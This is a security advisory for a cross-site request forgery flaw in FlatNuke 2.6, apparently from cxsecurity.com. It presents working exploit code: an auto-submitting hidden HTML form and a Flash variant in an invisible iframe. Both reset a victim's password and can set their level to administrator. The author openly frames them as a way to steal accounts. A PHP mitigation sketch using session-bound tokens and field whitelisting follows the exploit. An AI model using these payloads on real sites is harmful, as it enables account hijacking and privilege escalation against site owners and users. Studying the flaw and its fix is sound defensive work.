FlatNuke, Arbitrary Command Inclusion

Credit: darkbunny91
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

/* hackflatnuke.txt
 *
 * Tested on FlatNuke version 2.6 (can work on 3 but it has to be modified)
 *
 * With this trick you can steal/modify a FlatNuke account by changing the password and all the profile, or change your profile and become an admin
 *
 * Requirements:
 * - You have to know the nickname of the account you want to steal or change
 *
 */

HTML version (modifiable)

<!-- flatnuke.html-->
<html>
<body>
<title>Hack FlatNuke</title>
<form method="POST" action="http://www.site.com/path_flatnuke/index.php?mod=none_Login">
<input type="hidden" name="action" value="saveprofile">
<input type="hidden" name="user" value="VICTIM">
<input type="hidden" name="regpass" value="NEW_PASS">
<input type="hidden" name="anag" value="NAME">
<input type="hidden" name="homep" value="VICTIM_SITE">
<input type="hidden" name="prof" value="PROFESSION">
<input type="hidden" name="prov" value="ORIGIN">
<input type="hidden" name="ava" value="blank.png">
<input type="hidden" name="url_avatar" value="">
<input type="hidden" name="firma" value="VICTIM">
<input type="hidden" name="level" value="LEVEL from 1 to 10 P.S. 10=administrator">
</form>
<script>
document.body.onload = document.forms[0].submit();
</script>
</body>
</html>
<!-- Byez -->

Flash version, which you have to export to a swf and import in an iframe

exploit.swf

var action:String = "saveprofile";
var user:String = "nome_user_che_modifichiamo";
var regpass:String = "nuova_pass";
var anag:String = "nome";
var homep:String = "sito_utente";
var prof:String = "professione";
var prov:String = "provenienza";
var ava:String = "blank.png";
var url_avatar:String = "";
var firma:String = "firma_utente";
var level:String = "livello da 1 a 10 N.B 10=amministartore";
getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login", "_self", "POST");

hackflatnuke.html

<html>
<head>
<title>Title</title>
</head>
<body bgcolor="000000">
<center>
<font face="Verdana" size="5" color="#FF0000">
Hack FlatNuke
</font>
<iframe src="exploit.swf" frameborder="0" height="0" width="0"></iframe>
</center>
</body>
</html>
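
Mitigation sketch, added here as an example and not taken from FlatNuke or from the advisory: a saveprofile handler that rejects the forged POST above by requiring a session-bound token, taking the edited account from the session, and dropping the "user" and "level" fields. The function names, the csrf_token field and the session keys are assumptions; only the request field names come from the advisory's form.

```php
<?php
// Added example: hypothetical hardened handler, NOT FlatNuke source code.
// Request field names come from the advisory's form; csrf_token and the
// $session keys 'user' / 'level' are assumptions made for illustration.

function issue_csrf_token(array &$session): string {
    // One unpredictable token per session, embedded in every legitimate form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function handle_saveprofile(array $post, array $session): array {
    // 1. A cross-site form cannot read the session-bound token, so it fails here.
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || empty($session['csrf_token'])
        || !hash_equals($session['csrf_token'], $sent)) {
        return ['ok' => false, 'reason' => 'csrf'];
    }
    // 2. The account being edited is the logged-in one, never the "user" field.
    if (empty($session['user'])) {
        return ['ok' => false, 'reason' => 'not_logged_in'];
    }
    // 3. Accept only profile fields; "user" and "level" are dropped, so the
    //    privilege level cannot be raised through this action.
    $allowed = ['regpass', 'anag', 'homep', 'prof', 'prov', 'ava', 'url_avatar', 'firma'];
    $fields = array_intersect_key($post, array_flip($allowed));
    return ['ok' => true, 'user' => $session['user'],
            'level' => $session['level'] ?? 0, 'fields' => $fields];
}

// Constructed demo data: a logged-in session, then two POST bodies.
$session = ['user' => 'alice', 'level' => 1];
$token = issue_csrf_token($session);

// Same shape as the advisory's auto-submitted form: no token, user and level set.
$forged = ['action' => 'saveprofile', 'user' => 'alice',
           'regpass' => 'NEW_PASS', 'level' => '10'];
// Form rendered by the site itself, carrying the token.
$legit = ['action' => 'saveprofile', 'csrf_token' => $token,
          'anag' => 'Alice', 'level' => '10'];

var_dump(handle_saveprofile($forged, $session));
var_dump(handle_saveprofile($legit, $session));
```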


Copyright 2019, cxsecurity.com

